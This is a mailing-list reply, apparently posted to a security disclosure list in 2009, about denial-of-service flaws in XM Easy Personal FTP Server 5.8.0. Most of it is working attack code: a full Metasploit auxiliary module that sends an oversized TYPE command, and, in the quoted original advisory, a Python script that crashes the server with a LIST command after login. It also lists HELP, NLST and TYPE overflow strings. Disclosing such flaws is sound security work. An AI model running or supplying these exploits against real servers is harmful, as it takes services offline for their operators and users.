[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability



Hi,
It's seem to have much more bugs then what you listed in your advisory.

It's possible to DoS the server with this 3 others commands;

HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)

Here is an auxiliary module for metasploit...

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Ftp
        include Msf::Auxiliary::Dos      

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'XM Easy Personal FTP Server 5.8.0 Type  DoS',
                        'Description'    => %q{
                                You need a valid login to DoS this FTP server, but
                                even anonymous can do it as long as it has permission
                                to call Type.
                        },
                        'Author'         => 'Francis Provencher, Protek Research Lab',
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 1 $',
                        'References'     => [
                                [ 'URL', ' http://protekresearch.blogspot.com]
                        ],
                        'DisclosureDate' => '2009/11/10')
                )

                # They're required
                register_options([
                        OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
                        OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
                ])
        end

        def run
                return unless connect_login

                raw_send_recv("TYPE  #{'A' * 90000}\r\n")

                disconnect

                print_status("OK, server may still be technically listening, but it won't respond")
        end
end


 have a nice Day!

--- On Tue, 11/10/09, zhangmc@xxxxxxxxxxxxxxxx <zhangmc@xxxxxxxxxxxxxxxx> wrote:

> From: zhangmc@xxxxxxxxxxxxxxxx <zhangmc@xxxxxxxxxxxxxxxx>
> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Received: Tuesday, November 10, 2009, 3:07 AM
> Date of Discovery: 10-Nov-2009
> 
> Credits:zhangmc[at]mail.ustc.edu.cn
> 
> Vendor: Dxmsoft
> 
> Affected:
> XM Easy Personal FTP Server 5.8.0
> Earlier versions may also be affected
> 
> Overview:
> XM Easy Personal FTP Server is a easy use FTP server
> Application. Denial of service vulnerability exists in XM
> Personal FTP Server that causes the application to crash
> when the "LIST" is sent to FTP server if you do not use
> "PASV" or "POST" first.
> 
> Details:
> XM Easy Personal FTP Server can't handle "LIST" command if
> you do not use "PASV" or "POST" first.If you have logged on
> the server successfully,a "LIST" command will lead the ftp
> server to crash.
> 
> Severity:
> High
> 
> Exploit example:
> #!/usr/bin/python
> import socket
> import sys
> 
> def Usage():
>     print ("Usage:  ./expl.py
> <serv_ip>      <Username>
> <password>\n")
>     print ("Example:./expl.py 192.168.48.183
> anonymous anonymous\n")
> if len(sys.argv) <> 4:
>         Usage()
>         sys.exit(1)
> else:
>     hostname=sys.argv[1]
>     username=sys.argv[2]
>     passwd=sys.argv[3]
>     sock = socket.socket(socket.AF_INET,
> socket.SOCK_STREAM)
>     try:
>         sock.connect((hostname, 21))
>     except:
>         print ("Connection error!")
>         sys.exit(1)
>     r=sock.recv(1024)
>     sock.send("user %s\r\n" %username)
>     r=sock.recv(1024)
>     sock.send("pass %s\r\n" %passwd)
>     r=sock.recv(1024)
>     sock.send("LIST\r\n")
>     sock.close()
>     sys.exit(0);
> 
> 
> 


      __________________________________________________________________
The new Internet Explorer® 8 - Faster, safer, easier.  Optimized for Yahoo!  Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/